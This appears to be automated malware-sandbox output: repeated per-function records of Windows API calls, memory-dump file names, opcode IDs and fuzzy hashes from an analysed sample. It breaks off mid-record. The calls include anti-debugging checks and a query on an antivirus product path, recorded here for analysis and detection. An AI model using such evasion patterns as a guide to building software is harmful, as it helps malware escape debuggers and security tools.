                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00426704
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                • String ID:
                                • API String ID: 254469556-0
                                • Opcode ID: 99b749b4c23a0372566dcd9fd4dc845c2fb32dd57bf8318ca9f0ffeb8e337bf0
                                • Instruction ID: a82c3760a6ab8bfab62373b10b7095e37bda32351f50b1748f4796adc768ac66
                                • Opcode Fuzzy Hash: 99b749b4c23a0372566dcd9fd4dc845c2fb32dd57bf8318ca9f0ffeb8e337bf0
                                • Instruction Fuzzy Hash: C1312B75D4532C9BDB10DF64E989BCDBBB8AF08304F5040EAE50DAB250EB759A848F09
                                APIs
                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042909B
                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004290A5
                                • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 004290B2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: b213717609e6658d44c948d36fca8b4756e98b17e9e7c5cca8b300ea6e1cc35b
                                • Instruction ID: 6b08f9915b07e0e8d52bad2dc6f3aa6ed3274d1294e6d9fca1ce475895b9ac51
                                • Opcode Fuzzy Hash: b213717609e6658d44c948d36fca8b4756e98b17e9e7c5cca8b300ea6e1cc35b
                                • Instruction Fuzzy Hash: E631C77494122C9BCB21DF29EC8978DBBB8BF08314F5041EAE51CA7251EB749F858F49
                                APIs
                                • NtQueryInformationThread.NTDLL(?,?), ref: 0040A267
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: InformationQueryThread
                                • String ID: `F
                                • API String ID: 741662350-510860190
                                • Opcode ID: cad7c4a8a11764e7206483273463ae4e5f5c90f279c51f1d64dcac72bc62a2a6
                                • Instruction ID: 4f84e763385abcff93eebd2034bcd81d798d03b0a369463097fac9962f46e657
                                • Opcode Fuzzy Hash: cad7c4a8a11764e7206483273463ae4e5f5c90f279c51f1d64dcac72bc62a2a6
                                • Instruction Fuzzy Hash: 7A025B74A002288FDB25CF28C8547DABBB1BF4A304F0482EAD84DA7391DB755E95CF95
                                APIs
                                • NtQueryFullAttributesFile.NTDLL ref: 00405C00
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AttributesFileFullQuery
                                • String ID: `F
                                • API String ID: 3545844373-510860190
                                • Opcode ID: c82a591059207ad81dc77ec4763afcdd7b677faa4973f9135b0cbad2664510ae
                                • Instruction ID: 905df4a0714638a9d8b6f9dac6277ad69cf66fb1334f20b1e0a44fc1bfba48b1
                                • Opcode Fuzzy Hash: c82a591059207ad81dc77ec4763afcdd7b677faa4973f9135b0cbad2664510ae
                                • Instruction Fuzzy Hash: FD617EB1D047589BEB10CF54C8817EEBBB4FF49304F1441AAD909B7281EB78AA84CF95
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID: `F
                                • API String ID: 823142352-510860190
                                • Opcode ID: 4b3d75baa8c419f0623ae27369b1416c4f4972b08d8faa6453aa77568c0e7ed9
                                • Instruction ID: a6a1c845347c42b30f96973a4b5f68b0bbc4dbfc89fcc592a5f9701a6fe9ad71
                                • Opcode Fuzzy Hash: 4b3d75baa8c419f0623ae27369b1416c4f4972b08d8faa6453aa77568c0e7ed9
                                • Instruction Fuzzy Hash: 22217CB1A14619AFDB00CF59DC45BAEFBF8FB49714F10822AE814E7780D7B969048BD4
                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 00402601
                                • NtQueryDirectoryFile.NTDLL(?,00000000,00000010,?,?,?,0040D019,00468C5C,McAfee\WPS\content\av-trust), ref: 00402677
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Concurrency::cancel_current_taskDirectoryFileQuery
                                • String ID:
                                • API String ID: 2349893733-0
                                • Opcode ID: 0aa61cfe8a2fd82bd45026e3b44ea01a353ca5e6defede7d5e0b7771f3216629
                                • Instruction ID: 2a90b5cf591512a5cdeba4c26a754da4f3268bd0b7b4320af399ed805259977d
                                • Opcode Fuzzy Hash: 0aa61cfe8a2fd82bd45026e3b44ea01a353ca5e6defede7d5e0b7771f3216629
                                • Instruction Fuzzy Hash: CA41B472600208AFDB14CF68DD55A9ABBE8FB49310F10063EF916D7390D7B6A954CB94
                                APIs
                                • DeviceIoControl.KERNEL32(0040C674,000900EB,00000000,00000000,?,00000250,?,00000000), ref: 00405FCB
                                • GetLastError.KERNEL32 ref: 00406021
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ControlDeviceErrorLast
                                • String ID:
                                • API String ID: 2645620995-0
                                • Opcode ID: 04e641ec1fb86140a7d1631f186cff32dec831f1eaf7a8a8b476e896b9aa59fa
                                • Instruction ID: 481f0870b27d6d286ceff04ecec3c3b188e6e4ea812a3fd8afbe570dae2f5b2e
                                • Opcode Fuzzy Hash: 04e641ec1fb86140a7d1631f186cff32dec831f1eaf7a8a8b476e896b9aa59fa
                                • Instruction Fuzzy Hash: 203152B4A052089FDB10DF64DC49BAEB7F4AB08304F5041AEE915A7381DB75AE44CF99
                                APIs
                                • GetSystemTimePreciseAsFileTime.KERNEL32(?,00424B1E,?,?,?,?,00424B53,A05DD77D,?,?,?,?,?,0042463E,0043BB75,00000001), ref: 0042563F
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00424B1E,?,?,?,?,00424B53,A05DD77D,?,?,?,?,?,0042463E), ref: 00425643
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Time$FileSystem$Precise
                                • String ID:
                                • API String ID: 743729956-0
                                • Opcode ID: 15977bd66e7dbdc32aede047bad92e3bde5b96873450a8914fb1cc3cae41b53c
                                • Instruction ID: 6fb57fc9440cc16266d1a9460a27507f428bfc13e8641e9bc812ff6101ce1af3
                                • Opcode Fuzzy Hash: 15977bd66e7dbdc32aede047bad92e3bde5b96873450a8914fb1cc3cae41b53c
                                • Instruction Fuzzy Hash: 34D02232B00A38D78B122F90FC045AD7F18FA4AB6238C0036FA0947220CBB21C104BDE
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: ]uA
                                • API String ID: 0-3367409732
                                • Opcode ID: 535fe90985ea1ed41850480731cc03712c4a3a17051fdf9307385f7c098b2fe5
                                • Instruction ID: d791682f568accd8d46cc3015fb0f821abe5dad6c06d3b5f7eb865ecaed707df
                                • Opcode Fuzzy Hash: 535fe90985ea1ed41850480731cc03712c4a3a17051fdf9307385f7c098b2fe5
                                • Instruction Fuzzy Hash: 4B727E74E052059FDB18CF69C4506EABBF2BF58300F18825BD846EB351E73899D2CB99
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID:
                                • API String ID: 1302938615-0
                                • Opcode ID: c84c5cd9668583c77f5f46140b28a9ca25975e1d128ad5f0d9ee327595e19082
                                • Instruction ID: 302f7963b6ffb2a0121c66963e2d399897cc8ab08f8f879f79e7ffb8e7703690
                                • Opcode Fuzzy Hash: c84c5cd9668583c77f5f46140b28a9ca25975e1d128ad5f0d9ee327595e19082
                                • Instruction Fuzzy Hash: D1220B28E192C18FC70A9B7D95501ACFFB2DB5B20072881BFD9D5D7363C6348A4AC769
                                APIs
                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00439016,?,?,00000008,?,?,00438C20,00000000), ref: 00439248
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionRaise
                                • String ID:
                                • API String ID: 3997070919-0
                                • Opcode ID: 320e0a44221bb08c13791a964f315cf3d23cebd4edfca91fc28c346566873fe1
                                • Instruction ID: d524b35ccba0a8371b8ac89635f1baa2330d78886d1d1fb6d1fd286d82769cc8
                                • Opcode Fuzzy Hash: 320e0a44221bb08c13791a964f315cf3d23cebd4edfca91fc28c346566873fe1
                                • Instruction Fuzzy Hash: 56B16F35610605DFEB14CF28C48AB567BA0FF09364F259699E89ACF3A1C379ED42CB44
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: ]uA
                                • API String ID: 0-3367409732
                                • Opcode ID: bbf274435d54361ad22059b2d439a5fc3973483437367c667e9d2e5034b80913
                                • Instruction ID: 504e5fb12da2a8a749ab313f64fc292f86d71b50c631b6d9b7c66a2c412de158
                                • Opcode Fuzzy Hash: bbf274435d54361ad22059b2d439a5fc3973483437367c667e9d2e5034b80913
                                • Instruction Fuzzy Hash: 79125170E006099FCB08CF69C4906E9B7F2BF58314F24826ED416A7745E739E996CF98
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00426242
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FeaturePresentProcessor
                                • String ID:
                                • API String ID: 2325560087-0
                                • Opcode ID: 3a0652957b94c65751ecaa035cc8ade31b91b0f146b4116cda52428a2f496f1e
                                • Instruction ID: 7b016f5ca3908a463cb7123c52cdb2a794a8838f1a5dc7a156c89709ba8e5cd8
                                • Opcode Fuzzy Hash: 3a0652957b94c65751ecaa035cc8ade31b91b0f146b4116cda52428a2f496f1e
                                • Instruction Fuzzy Hash: 705181B1A002158BDB18CF99E9816ABBBF0FB45314F25857ED805E7351E3B99900CF69
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: c1de0305faece5705f446036fedc47572cdb626cf013c5b27a2252d9c2f40ff0
                                • Instruction ID: 0a2ae5f7ae8fa281ffed41ecf2e6ec4e3655c5d9ffb253552512ca14627cd468
                                • Opcode Fuzzy Hash: c1de0305faece5705f446036fedc47572cdb626cf013c5b27a2252d9c2f40ff0
                                • Instruction Fuzzy Hash: B9E1AD70B006258FCB24CF28E5C1A6EBBB1FF45314BA4465FD45A9B390D738AD42CB5A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7ab4a2839f2287baed125f36495a183e79032d5ab567039cb894208fea70c7fb
                                • Instruction ID: 7ddea0066d226893fbf7024c1d85fae41141ccd341a64ad5b04c447128be1602
                                • Opcode Fuzzy Hash: 7ab4a2839f2287baed125f36495a183e79032d5ab567039cb894208fea70c7fb
                                • Instruction Fuzzy Hash: 0F313472900219AFDB24DFB9CC88DBBB77DEB88314F14419AF905D7244EA34EE408B58
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 2abe8b27b6dea7b2167edaa51354998dd9750d324749d5c5d7909ba605f66502
                                • Instruction ID: 71d7cc87f99a5dd2ecb6189b62105c1d2700c14eb1c6d507e7ecab27e8983a78
                                • Opcode Fuzzy Hash: 2abe8b27b6dea7b2167edaa51354998dd9750d324749d5c5d7909ba605f66502
                                • Instruction Fuzzy Hash: 44C1FF70B0066A8FCB24DF28E4D076FB7A2AF45314FA4861FD45297391C738AD46CB59
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                • Opcode ID: 4767ca6bbdd4f35b0fa63db399399c87933254b465a6464eb5f06548f33a2a6d
                                • Instruction ID: 75fc5f5100c78b8a637556c6567d15d84167fb611d7d5bb37f9eb5198634761e
                                • Opcode Fuzzy Hash: 4767ca6bbdd4f35b0fa63db399399c87933254b465a6464eb5f06548f33a2a6d
                                • Instruction Fuzzy Hash: 8301D831A48258DFD714CF58D805B6677A8EB09724F1441BFE806D77D0D77B9800CB88
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_000467A2,00425F2C), ref: 0042679B
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
